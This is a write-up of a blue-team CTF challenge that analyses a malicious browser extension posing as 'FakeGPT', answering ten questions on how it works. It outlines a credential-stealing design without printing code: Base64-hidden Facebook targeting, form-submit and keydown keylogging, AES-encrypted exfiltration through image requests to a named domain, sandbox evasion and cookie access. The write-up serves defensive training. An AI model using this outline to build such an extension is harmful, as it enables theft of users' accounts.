FakeGPT

Overview

Room link: https://cyberdefenders.org/blueteam-ctf-challenges/fakegpt/

We are given some files that make up a .crx file.

.
├── app.js
├── crypto.js
├── img.GIF
├── loader.js
├── manifest.json
└── ui.html

One way to analyze .crx files is to upload it to crxviewer.com. Since we are only given the inner files, we can turn those files back into a .crx by going to chrome://extensions, then click "Pack extension" and select the folder containing the files.

The folder arrangements need to be adjusted according to the error message. Remember that manifest.json is the "main" file that describes how the extension runs, while app.js provide the main logic. In addition to that, loader.js "loads" the extension and disables it when necessary.

.
└── extension
    ├── assets
    │	└── ui.html
    ├── core
    │	├── app.js
    │	└── crypto.js
    ├── img.GIF
    ├── manifest.json
    └── system
    	└── loader.js

.crx creation success! Although we can just read the scripts directly to analyze the extension, it's a good thing to learn how to pack and unpack extensions and understand how they work better.

Upload the .crx to crxviewer.com and let's move on to the questions.

1. Which encoding method does the browser extension use to obscure target URLs, making them more difficult to detect during analysis?

The target URL(s) can be found on app.js. The URL is encoded in base64.

Answer: Base64

2. Which website does the extension monitor for data theft, targeting user accounts to steal sensitive information?

This is a follow-up to question #1. The base64 text decodes to www.facebook.com.

Answer: www.facebook.com

3. Which type of HTML element is utilized by the extension to send stolen data?

In app.js, we see a functionality that sends data to the C2 server. The data is not sent directly. Instead, it's encrypted and then treated as an image, probably to bypass detection.

Answer: <img>

4. What is the first specific condition in the code that triggers the extension to deactivate itself?

The malware tries to disable itself when it's opened in a lab environment. This is done to prevent analysis. As shown by the code on loader.js, the malware detects lab environment using navigator.plugins.length === 0 as one of the conditions.

Answer: navigator.plugins.length === 0

5. Which event does the extension capture to track user input submitted through forms?

So, this part of the code in app.js essentially captures the victim's username and password data as they log into the target websites (such as facebook.com). The data was taken from the login form and captured at the moment the victim submits the form.

Answer: submit

6. Which API or method does the extension use to capture and monitor user keystrokes?

Not only that the code tracks login forms on target websites, it also tracks each keystroke typed by the victim on those websites. It's basically a keylogger.

Answer: keydown

7. What is the domain where the extension transmits the exfiltrated data?

We can see this from the sendToServer function code.

Answer: Mo.Elshaheedy.com

8. Which function in the code is used to exfiltrate user credentials, including the username and password?

This is pretty obvious from the function name, but we can always confirm by looking at the instructions inside the function.

Answer: exfiltrateCredentials(username, password);

9. Which encryption algorithm is applied to secure the data before sending?

We can see from the code that the exfiltrated data is first encrypted using the function encryptPayload. The encryption function is written in crypto.js. The encryption algorithm is AES.

Answer: AES

10. What does the extension access to store or manipulate session-related data and authentication information?

This is more of a general knowledge on how browser works. Session-related data and authentication information are stored in cookies and the browser's local storage. We can take a look at manifest.json and see that "cookies" is one of the permissions allowed to the extension.

Answer: cookies